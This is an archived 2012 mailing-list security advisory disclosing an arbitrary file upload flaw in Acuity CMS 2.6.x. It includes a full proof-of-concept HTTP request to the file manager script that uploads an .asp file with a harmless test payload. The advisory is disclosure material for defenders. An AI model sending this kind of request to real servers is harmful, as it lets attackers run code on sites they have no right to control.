lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <CAPYM6VxWRRUTezftmwnRiGTZkP29beHNr2Qp9bRuN+qEZLLDBA@mail.gmail.com>
Date: Sun, 20 May 2012 17:48:55 +0800
From: YGN Ethical Hacker Group <lists@...g.net>
To: full-disclosure <full-disclosure@...ts.grok.org.uk>,
  bugtraq <bugtraq@...urityfocus.com>, secalert@...urityreason.com,
  bugs@...uritytracker.com, vuln <vuln@...unia.com>, vuln@...urity.nnov.ru,
  news@...uriteam.com, moderators@...db.org,
  submissions@...ketstormsecurity.org, submit@...ecurity.com,
  oss-security@...ts.openwall.com
Subject: Acuity CMS 2.6.x <= Arbitrary File Upload

1. OVERVIEW

Acuity CMS 2.6.x (ASP-based) versions are vulnerable to Arbitrary File Upload.


2. BACKGROUND

Acuity CMS is a powerful but simple, extremely easy to use, low
priced, easy to deploy content management system. It is a leader in
its price and feature class.


3. VULNERABILITY DESCRIPTION

Acuity CMS 2.6.x (ASP-based) version contain a flaw that may allow an
attacker to upload .asp/.aspx files without restrictions, which will
execute ASP(.Net) codes. The issue is due to the script,
/admin/file_manager/file_upload_submit.asp , not properly sanitizing
'file1', 'file2', 'file3', 'fileX' parameters.


4. VERSIONS AFFECTED

Tested with version 2.6.2.


5. PROOF-OF-CONCEPT/EXPLOIT

[REQUEST]
POST /admin/file_manager/file_upload_submit.asp HTTP/1.1
Host: localhost
Cookie: ASPSESSIONID=XXXXXXXXXXXXXXX

-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="path"

/images
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="rootpath"

/
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="rootdisplay"

http://localhost/
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="status"

confirmed
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="action"

fileUpload
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="file1"; filename="0wned.asp"
Content-Type: application/octet-stream

<% response.write("0wned!") %>

-----------------------------6dc3a236402e2--

[/REQUEST]


6. SOLUTION

The Acunity CMS is no longer in active development.
It is recommended to user another CMS in active development and support.


7. VENDOR

The Collective
http://www.thecollective.com.au/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-05-20: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bacuity_cms2.6%20x_(asp)%5D_arbitrary_fileupload

#yehg [2012-05-20]

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ